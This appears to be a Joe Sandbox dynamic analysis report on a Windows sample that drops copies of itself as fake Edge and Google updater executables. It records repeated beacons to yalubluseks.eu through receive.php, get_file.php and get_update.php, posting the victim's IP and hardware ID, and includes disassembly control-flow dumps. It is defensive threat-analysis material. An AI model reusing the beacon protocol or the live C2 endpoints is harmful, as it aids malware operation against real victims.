                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fniMEKcqckbxa5G7W5%2B9Vip60ipBhUkjWqdgddfvpPoWDejx%2FdBm25qF0p8xEwLVJmbCouSdvRCAxkCvNsEen0UtXrEFgDZWyTfHYkocrmFB2vV6gbdffBjwH2GlDdfLsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc929ff3d92443e-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                32192.168.2.652968104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:29:59 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:29:59 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:29:59 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:29:59 UTC605INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:29:59 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=micCEbqIRWamFvlfH0zYA8Bq05sXnhEoH1A2GixrDdXuJ4ZXV8SRfSZ3TJUGejlDwAyI57fSwC9dZOuvRNKhaLK4skDfje5%2BRW%2FytU0gbR2ECWvbhSr4d5wv9VikkRjHvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92a114a0742e0-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                33192.168.2.652970104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:00 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:30:00 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:30:00 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:30:01 UTC603INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:01 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Agzj7WTiMrkzeduMl9XQOoISzJjBa1l8T4Bc9t5xF7Rkyrq9jPznyOwCqGPYTdDxOmQg2yXDpDRZ0b0PsiShqsmqlzQx3I5xrKvZJ80ztRoa%2FzvbEsQ3Fbe43WsoKwMIlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92a1adafc4289-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                34192.168.2.652971104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:01 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:30:01 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:30:01 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:30:02 UTC611INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:02 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iu4Xs2m80VgMs%2BBOA1tAVyiFtC298CkVuu4ncs1atUb%2BUMksEt%2FlzlnSDhIabrvrpEZmOrNoHldxRXgYfQ6UzEpBPqB%2BokCGdc4txk3ACWXSbA%2Bz0q5LHJbxIBE8HOMsYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92a20d8761986-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                35192.168.2.652973104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:09 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:30:10 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:30:10 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:30:10 UTC613INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:10 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9af4bmFfOoUyC0eNjTGoPtwMEIuG2N%2F4s0vVB0o3q0Pt1HdyYsWXkHzhuG06OCzybKYtX2UcWqUeF9awSfb0d%2Fn%2FKQDfrxEOYLmVTCY7%2BBdhX%2Fps1Dr96oXecnK%2FWR3v0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92a550d057274-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                36192.168.2.652975104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:11 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:30:11 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:30:12 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:30:12 UTC605INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:12 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwSJRVdHdsRyqW1di9xCuwn7XuUAKrK%2FZUixekig4uChXB9foF1YIt6ouBaUrxcSZssGoETxz7vzMrr4YOSwKPPU%2Bj6Q8fsdnQVtOGGJ9LILdNllGyITP4uiSuTGeZdI0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92a5e8caf1881-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                37192.168.2.652976104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:13 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:30:13 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:30:13 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:30:13 UTC611INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:13 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fn8BX9E4YeIQpe%2BepDgHsokZU77fk9fvY35mzHP4ywgw18OSuks%2FUxZMwHsV%2FkYwvMRO67CB95HpnaeMnK5i8Td05dM%2BLyFJZLQtWConI9BEyBXh1z2%2Bf4LyYaxH6YHroQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92a6a7a427290-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                38192.168.2.652978104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:20 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:30:20 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:30:20 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30
                Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
                2024-10-03 01:30:21 UTC609INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:21 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pV5ec%2BcONTcWTwfvJih5CJfmvlUnhLfnNUUQ3tjFK5%2FWrjkAixZZFGbDUHfQ68EB49Q%2BMMqTe3uxiP1%2Bdu9089GMUbNlKFVu7lSAKw8CGsnh2Rra1wZwb7Np2yrWkN1N1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92a973c1842ac-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                39192.168.2.652979104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:21 UTC144OUTPOST /get_file.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:30:21 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:30:21 UTC84OUTData Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
                2024-10-03 01:30:22 UTC605INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:22 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9pf4VuhIBXesCAmOiW0wtG5Tct6Iz%2BlsMlnfjZbS39DaxivHU7mPbo2vYwahY7U2cjkDI5GZ6Azh%2FYMTbgDLxWfkExGRna4HnfsYu05fi3bfccs84xBDgyMXqRd7k7W0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92a9dffce4343-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                40192.168.2.652980104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:22 UTC146OUTPOST /get_update.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 19
                Expect: 100-continue
                2024-10-03 01:30:22 UTC25INHTTP/1.1 100 Continue
                2024-10-03 01:30:22 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                Data Ascii: current_version=0.3
                2024-10-03 01:30:23 UTC613INHTTP/1.1 200 OK
                Date: Thu, 03 Oct 2024 01:30:23 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oT7DgCe3ADTGvfdOpJ5Tlpc%2FxLkWeIwE8lSWdkfzco6cDZax7taFie%2FtRJJO1KRZhyWb7l1n%2B0HtUPfzLcadzTbK%2BRDZYM1eptjfFxWH%2BPJcV0MxSzNJWHFTib%2FceUylbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8cc92aa4adeb42ac-EWR
                0


                Session IDSource IPSource PortDestination IPDestination Port
                41192.168.2.652981104.21.54.163443
                TimestampBytes transferredDirectionData
                2024-10-03 01:30:53 UTC143OUTPOST /receive.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: yalubluseks.eu
                Content-Length: 84
                Expect: 100-continue
                2024-10-03 01:30:53 UTC25INHTTP/1.1 100 Continue


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:21:26:10
                Start date:02/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x590000
                File size:243'888 bytes
                MD5 hash:F37E0267C53AE8E94FE38E87524B8C45
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:21:26:10
                Start date:02/10/2024
                Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                Imagebase:0x150000
                File size:243'888 bytes
                MD5 hash:F37E0267C53AE8E94FE38E87524B8C45
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 18%, ReversingLabs
                • Detection: 24%, Virustotal, Browse
                Reputation:low
                Has exited:false

                Target ID:3
                Start time:21:26:11
                Start date:02/10/2024
                Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker
                Imagebase:0x8a0000
                File size:243'888 bytes
                MD5 hash:F37E0267C53AE8E94FE38E87524B8C45
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 18%, ReversingLabs
                • Detection: 24%, Virustotal, Browse
                Reputation:low
                Has exited:false

                Target ID:4
                Start time:21:26:23
                Start date:02/10/2024
                Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                Imagebase:0x9f0000
                File size:243'888 bytes
                MD5 hash:F37E0267C53AE8E94FE38E87524B8C45
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:7
                Start time:21:26:23
                Start date:02/10/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 932
                Imagebase:0x960000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:21:26:31
                Start date:02/10/2024
                Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
                Imagebase:0x9a0000
                File size:243'888 bytes
                MD5 hash:F37E0267C53AE8E94FE38E87524B8C45
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:13
                Start time:21:26:31
                Start date:02/10/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 932
                Imagebase:0x960000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:15
                Start time:21:26:39
                Start date:02/10/2024
                Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                Imagebase:0x20000
                File size:243'888 bytes
                MD5 hash:F37E0267C53AE8E94FE38E87524B8C45
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:17
                Start time:21:26:40
                Start date:02/10/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 932
                Imagebase:0x960000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:18
                Start time:21:26:47
                Start date:02/10/2024
                Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
                Imagebase:0x260000
                File size:243'888 bytes
                MD5 hash:F37E0267C53AE8E94FE38E87524B8C45
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:20
                Start time:21:26:48
                Start date:02/10/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 932
                Imagebase:0x960000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Reset < >

                  Execution Graph

                  Execution Coverage:27.9%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:100%
                  Total number of Nodes:6
                  Total number of Limit Nodes:0
                  execution_graph 9845 4df5d50 9846 4df5d9e NtProtectVirtualMemory 9845->9846 9848 4df5de8 9846->9848 9849 4df6230 9850 4df627b NtAllocateVirtualMemory 9849->9850 9852 4df62c2 9850->9852
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: j'R$&03$9!7J$;.%
                  • API String ID: 0-3501266285
                  • Opcode ID: d0e5cebf1f31d4dd2c9ed88e4e7997b67f68b790062b1f0044695b3a7cfb152b
                  • Instruction ID: 13317df623229b213eb121e37c3a391a18a95b1717f9eadae40400dff8983260
                  • Opcode Fuzzy Hash: d0e5cebf1f31d4dd2c9ed88e4e7997b67f68b790062b1f0044695b3a7cfb152b
                  • Instruction Fuzzy Hash: 14E31975E112698FDB64DF68C880A9DB7B6FB88300F5145EAD809E7351DB31AE81CF90
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2205766883.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4df0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: K?
                  • API String ID: 0-2319294075
                  • Opcode ID: 2e5d93789519bcbfd9f8a259f10fb3f0108d4f693d607ec8949093d51d579025
                  • Instruction ID: c92d7a1bf26e167e6b1517795fb30c59598223354c33fa9876c4d16577306c5f
                  • Opcode Fuzzy Hash: 2e5d93789519bcbfd9f8a259f10fb3f0108d4f693d607ec8949093d51d579025
                  • Instruction Fuzzy Hash: 6EE24B75B00219CFDB64DF69CC84A99B7B2BF88300F1581A9E609AB361DB71ED85CF50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1203 fe9198-fe91aa 1204 fe91ac-fe9242 1203->1204 1210 fe9267-fe928e 1204->1210 1211 fe9244-fe9247 1204->1211 1215 fe9294-fe929f 1210->1215 1211->1210 1212 fe9249-fe925f 1211->1212 1212->1210 1218 fe92a5-fe92d4 1215->1218 1219 fe9580-fe9587 1215->1219 1221 fe92da-fe92f8 1218->1221 1222 fe9535-fe954c 1218->1222 1219->1204 1220 fe9589-fe9593 1219->1220 1221->1218 1223 fe92fa-fe9333 1221->1223 1222->1218 1224 fe9552-fe9560 1222->1224 1223->1222 1225 fe9339-fe9378 1223->1225 1224->1219 1226 fe9562-fe9578 1224->1226 1225->1222 1227 fe937e-fe938c 1225->1227 1226->1219 1227->1218 1228 fe9392-fe9401 1227->1228 1228->1204 1234 fe9407-fe945d 1228->1234 1237 fe9502-fe9509 1234->1237 1237->1204 1238 fe950f-fe9528 1237->1238 1239 fe952e 1238->1239 1240 fe9462-fe94ad 1238->1240 1239->1222 1241 fe9594-fe95ad 1240->1241 1242 fe94b3-fe94d6 1240->1242 1241->1220 1245 fe95af-fe95cb 1241->1245 1242->1218 1243 fe94dc-fe94fb 1242->1243 1243->1237 1246 fe95d0-fe95dd 1245->1246 1247 fe95e3-fe95f4 1246->1247 1248 fe97c0-fe97d1 1246->1248 1249 fe95f7-fe960c 1247->1249 1248->1246 1250 fe97d7-fe97dd 1248->1250 1251 fe9612-fe961e 1249->1251 1252 fe9763-fe976a 1249->1252 1253 fe97e3-fe97ef 1250->1253 1255 fe9839-fe988b call fe8fe0 1251->1255 1256 fe9624-fe9669 1251->1256 1252->1249 1254 fe9770-fe978f 1252->1254 1253->1249 1257 fe97f5-fe9804 1253->1257 1254->1251 1260 fe9795 1254->1260 1261 fe966b-fe967f 1256->1261 1262 fe96b7-fe96bd 1256->1262 1258 fe980c-fe980f 1257->1258 1259 fe9806-fe9808 1257->1259 1264 fe9819 1258->1264 1265 fe9811-fe9818 1258->1265 1263 fe980a 1259->1263 1259->1264 1266 fe979b-fe97a7 1260->1266 1261->1247 1267 fe9685-fe9689 1261->1267 1262->1246 1269 fe96c3-fe96d4 1262->1269 1263->1265 1277 fe981e-fe9832 1264->1277 1266->1246 1272 fe97ad-fe97b1 1266->1272 1267->1266 1273 fe968f-fe96a6 1267->1273 1270 fe96d6-fe96f8 1269->1270 1271 fe9744-fe974a 1269->1271 1270->1271 1275 fe96fa-fe9736 1270->1275 1271->1246 1276 fe9750-fe975d 1271->1276 1272->1253 1278 fe97b3-fe97b9 1272->1278 1273->1246 1279 fe96ac-fe96b2 1273->1279 1275->1246 1280 fe973c-fe9742 1275->1280 1276->1252 1277->1255 1278->1277 1281 fe97bb 1278->1281 1279->1266 1280->1266
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: 1O^
                  • API String ID: 0-971112054
                  • Opcode ID: 26d7fde7e3e8375e8ac1c6b4a87eccddee3b892a506100d76c8e93d9764778b4
                  • Instruction ID: 2354c023db66cc3f8edb9b9421d28d38f78816328827265e17fde73d98512361
                  • Opcode Fuzzy Hash: 26d7fde7e3e8375e8ac1c6b4a87eccddee3b892a506100d76c8e93d9764778b4
                  • Instruction Fuzzy Hash: F7128B76E042589FCB14DFAAD88069DB7F2FF89310B14816AE825E7350DB789E45CF90

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1288 feb7b8-feb7c6 1289 feb7c8-feb7d4 1288->1289 1291 feb7da 1289->1291 1292 feb882-feb88d 1289->1292 1293 feb7df-feb7fa 1291->1293 1292->1293 1294 feb893-feb8ab 1292->1294 1298 feb800-feb802 1293->1298 1294->1289 1297 feb8b1-feb8bc 1294->1297 1299 febb0e-febb23 1297->1299 1300 feb8c2 1297->1300 1301 feb849-feb857 1298->1301 1302 feb804-feb811 1298->1302 1321 febb56-febb6c 1299->1321 1322 febb25-febb51 1299->1322 1303 feba7d-feba88 1300->1303 1304 feb908-feb92b 1300->1304 1305 feb8c9-feb903 1300->1305 1306 feb999-feb9bc 1300->1306 1307 feb9e9-feba14 call fe99a0 1300->1307 1308 feba19-feba3c 1300->1308 1309 febab6-febadd 1300->1309 1310 feb972-feb994 1300->1310 1311 febae2-febb09 1300->1311 1312 feb930-feb93c 1300->1312 1313 feb9c1-feb9e4 1300->1313 1314 feba41-feba4f 1300->1314 1331 feb859-feb85f 1301->1331 1332 feb871-feb87d 1301->1332 1302->1289 1315 feb813-feb834 1302->1315 1303->1289 1318 feba8e-febab1 1303->1318 1354 febcb4-febcbb 1304->1354 1305->1354 1306->1354 1307->1354 1308->1354 1309->1354 1310->1354 1311->1354 1312->1289 1319 feb942-feb96d 1312->1319 1313->1354 1314->1289 1317 feba55-feba78 1314->1317 1315->1301 1338 feb836-feb83c 1315->1338 1317->1354 1318->1354 1319->1354 1321->1301 1336 febb72-febb84 1321->1336 1322->1354 1340 feb863-feb86f 1331->1340 1341 feb861 1331->1341 1332->1354 1364 febbae-febbb6 1336->1364 1365 febb86-febba9 1336->1365 1338->1293 1349 feb83e-feb847 1338->1349 1340->1332 1341->1332 1349->1301 1364->1289 1376 febbbc-febbce 1364->1376 1365->1354 1382 febc06-febc2e 1376->1382 1383 febbd0-febbd8 1376->1383 1387 febc89-febca3 1382->1387 1388 febc30-febc5f 1382->1388 1383->1298 1384 febbde-febc01 1383->1384 1384->1354 1401 febca6 call fecfb0 1387->1401 1402 febca6 call fecfa0 1387->1402 1388->1293 1393 febc65-febc87 1388->1393 1393->1354 1394 febca9-febcb2 call fe8f70 1394->1354 1401->1394 1402->1394
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2204585813.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                  Similarity
                  • API ID:
                  • String ID: 9x=]
                  • API String ID: 0-2310485032
                  • Opcode ID: 967f6b4c36d97c2dfd88d2c4f611ddb3022889438fd8c89982dd268a8aa5e22f
                  • Instruction ID: ed58814331bcb01430e89ee9cc14f81f4727aeda3aa2b8f82bb80e151b672dda
                  • Opcode Fuzzy Hash: 967f6b4c36d97c2dfd88d2c4f611ddb3022889438fd8c89982dd268a8aa5e22f
